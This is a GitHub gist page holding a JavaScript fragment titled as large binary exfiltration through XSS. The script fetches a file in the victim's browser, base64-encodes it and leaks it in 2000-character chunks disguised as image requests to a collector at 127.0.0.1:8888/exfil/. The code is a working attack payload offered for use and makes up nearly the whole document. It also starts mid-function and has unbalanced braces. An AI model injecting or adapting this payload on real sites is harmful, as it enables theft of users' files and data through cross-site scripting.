Skip to content

Instantly share code, notes, and snippets.

@hoodoer

hoodoer/binaryExfileXSS

Created March 6, 2020 03:17
Show Gist options
  • Save hoodoer/6d731ae951c5ba0fde5fd7c30152b9d4 to your computer and use it in GitHub Desktop.
Save hoodoer/6d731ae951c5ba0fde5fd7c30152b9d4 to your computer and use it in GitHub Desktop.
Download ZIP
Large binary exfil through XSS
Raw
binaryExfileXSS
fileXhr.open("GET", fileUri);
fileXhr.send(null);
console.log("Getting ready to get a file and exfil...");
fileXhr.onreadystatechange = function()
{
if (fileXhr.readyState == XMLHttpRequest.DONE)
{
var responseData = encodeURIComponent(fileXhr.response);
var exfilData = btoa(responseData);
// We need to split the files into chunks, otherwise it'll
// be too big of a URL path to send. We'll use the
// image filename as the method to exfil data
var chunkSize = 2000;
var index = 0;
var numFullChunks = ((exfilData.length / chunkSize) | 0);
var remainderBits = exfilData.length % chunkSize;
// Exfil time
for (i = 0; i < numFullChunks; i++)
{
//console.log("Loop is: " + i);
var exfilChunk = exfilData.slice(chunkSize * i, chunkSize * (i+1));
var downloadingImage = new Image();
downloadingImage.onload = function(){
image.src = this.src;
};
// Try to async load the image, whose name is the string of data
downloadingImage.src = "http://127.0.0.1:8888/exfil/" + i + "/" + exfilChunk + ".jpg";
}
// Get the last remainder bits...
var exfilChunk = exfilData.slice(chunkSize * numFullChunks, (chunkSize * numFullChunks) + remainderBits);
var downloadingImage = new Image();
downloadingImage.onload = function(){
image.src = this.src;
};
downloadingImage.src = "http://127.0.0.1:8888/exfil/" + "LAST" + "/" + exfilChunk + ".jpg";
console.log("Done exfiling chunks..");
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment